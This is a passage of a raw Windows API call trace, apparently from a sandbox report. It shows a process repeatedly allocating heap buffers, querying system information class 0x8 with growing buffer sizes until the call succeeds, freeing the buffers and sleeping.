SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0263.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0263.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0263.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0263.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0263.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.097] Sleep (dwMilliseconds=0x110) [0263.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0263.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0263.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0263.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0263.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0263.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0263.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0263.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0263.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.177] Sleep (dwMilliseconds=0x110) [0263.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0263.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0263.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0263.208] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0263.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0263.208] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0263.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0263.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0263.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.210] Sleep (dwMilliseconds=0x110) [0263.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0263.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0263.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0263.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0263.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0263.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0263.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0263.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0263.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.219] Sleep (dwMilliseconds=0x110) [0263.774] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0263.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.778] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0263.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0263.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0263.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0263.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0263.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0263.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0263.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.782] Sleep (dwMilliseconds=0x110) [0263.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0263.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0263.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0263.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0263.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0263.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0263.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.803] Sleep (dwMilliseconds=0x110) [0263.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0263.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0263.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0263.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0263.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0263.820] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.821] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.821] Sleep (dwMilliseconds=0x110) [0264.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0264.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0264.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0264.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0264.027] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0264.027] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.028] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0264.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0264.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0264.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0264.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0264.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0264.031] Sleep (dwMilliseconds=0x110) [0264.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0264.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0264.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0264.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0264.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0264.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0264.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0264.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0264.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0264.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0264.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0264.114] Sleep (dwMilliseconds=0x110) [0264.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0264.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0264.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0264.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0264.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0264.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0264.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0264.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0264.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0264.553] Sleep (dwMilliseconds=0x110) [0264.744] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0264.744] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.745] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0264.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0264.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0264.746] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0264.746] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.747] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0264.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0264.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0264.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0264.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0264.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0264.749] Sleep (dwMilliseconds=0x110) [0264.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0264.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0264.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0264.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0264.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0264.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0264.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0264.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0264.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0264.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0264.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0264.817] Sleep (dwMilliseconds=0x110) [0264.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0264.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0264.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0264.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0264.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0264.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0264.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0264.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0264.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0264.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0264.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0264.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0264.862] Sleep (dwMilliseconds=0x110) [0265.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0265.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0265.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0265.087] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0265.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0265.088] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0265.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0265.089] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0265.089] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.090] Sleep (dwMilliseconds=0x110) [0265.336] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0265.336] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.337] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: 